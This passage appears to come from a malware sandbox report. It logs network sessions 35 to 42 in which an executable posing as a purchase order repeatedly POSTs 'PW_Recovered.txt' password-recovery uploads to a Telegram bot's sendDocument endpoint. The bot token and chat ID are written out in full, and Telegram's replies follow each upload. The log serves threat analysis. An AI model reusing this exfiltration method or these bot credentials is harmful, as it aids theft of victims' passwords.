{"ok":true,"result":{"message_id":17227,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354963,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49926	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:16:05 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd31c275b6509a Host: api.telegram.org Content-Length: 581
2024-12-16 13:16:05 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 63 32 37 35 62 36 35 30 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd31c275b6509aContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:16:06 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:16:06 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:16:06 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17231,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354966,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49930	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:16:07 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd32858bb2d8ad Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:16:07 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 38 35 38 62 62 32 64 38 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd32858bb2d8adContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:16:08 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:16:08 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:16:08 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17233,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354968,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49936	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:16:09 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd334532b593f8 Host: api.telegram.org Content-Length: 581
2024-12-16 13:16:09 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 34 35 33 32 62 35 39 33 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd334532b593f8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:16:10 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:16:10 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:16:10 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17235,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354970,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49941	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:16:11 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd33cd13cbab4b Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:16:11 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 63 64 31 33 63 62 61 62 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd33cd13cbab4bContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:16:12 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:16:12 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:16:12 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17237,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354972,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49947	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:16:13 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd3477b07939ab Host: api.telegram.org Content-Length: 581
2024-12-16 13:16:13 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 37 37 62 30 37 39 33 39 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd3477b07939abContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:16:14 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:16:14 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:16:14 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17239,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354974,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49953	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:16:15 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd354553ed73c8 Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:16:15 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 34 35 35 33 65 64 37 33 63 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd354553ed73c8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:16:16 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:16:16 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:16:16 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17243,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354976,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49959	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:16:17 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd365c0748ebc1 Host: api.telegram.org Content-Length: 581
2024-12-16 13:16:17 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 35 63 30 37 34 38 65 62 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd365c0748ebc1Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:16:18 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:16:18 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:16:18 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17245,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354978,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49962	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:16:19 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd92e3d7cfdf0f Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
